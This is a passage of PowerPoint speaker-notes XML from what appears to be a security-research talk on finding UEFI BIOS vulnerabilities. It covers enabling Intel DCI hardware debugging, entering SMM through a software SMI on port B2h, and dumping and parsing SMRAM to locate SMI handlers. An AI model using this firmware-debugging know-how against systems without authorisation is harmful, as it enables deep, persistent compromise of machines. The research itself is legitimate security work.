          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 41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Shape 419"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Just use the BIOS setup!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>It works only for System-on-a-Chip though.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 42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Shape 274"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>My name is Alex Ermolov and I am security researcher at Embedi. Unfortunately, Ruslan Zakirov - my colleague, good friend wasn’t able to come. He had found the vulnerability this talk is mostly dedicated to.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 27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Shape 429"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Or, the DCI can be enabled by setting just one bit in DCI Control Register in MMIO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>But we haven’t managed to set this fourth bit because the eighth bit was set to one, and by practical consideration it was found out that it means “locked”. So if set, you can’s use the HDCIEN bit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 43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Shape 439"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So we have found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> an alternative way to enable the DCI. We used the AMI BIOS configuration tool enable the debugging feature. The configured image must be programmed to SPI flash memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>If everything is ok you will see a new device in the Device Manager.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 44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Shape 449"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>After the enablement you will need to set a few things up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Firstly, install Intel System Studio trial, then use the Configuration Console to set the platform to skylake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>After all the required actions have been performed, it is worth trying to start “PythonConsole.cmd” (you see it right: the console is designed as a python shell).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 45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Shape 458"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Try to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> halt the processor cores after the initialization, just to make sure it is operable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 46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Shape 466"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> let’s move to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>vulnerability discovering process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Shape 46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Shape 473"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The SMRAM memory dump can provide plenty of information useful for vulnerability detection in UEFI BIOS because most UEFI structures have unique signatures, which enables memory forensic. To dump it, we need to know the exact location of it. Here, the CHIPSEC framework may come in handy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 47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Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Then we should get to the only mode where SMRAM is visible, to SMM. To achieve this, we set a breakpoint on entering SMM. And then to generate the SMI via software way by writing in port B2h.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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Shape 489"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>When we are in SMM, we are able to dump the SMRAM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Shape 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Shape 49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Shape 497"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>To analyse it, you could use the smram_parse.py script. The point of interest are the SMI handlers which are the most widely used UEFI BIOS attack vector.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 49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Shape 505"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Shape 506"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
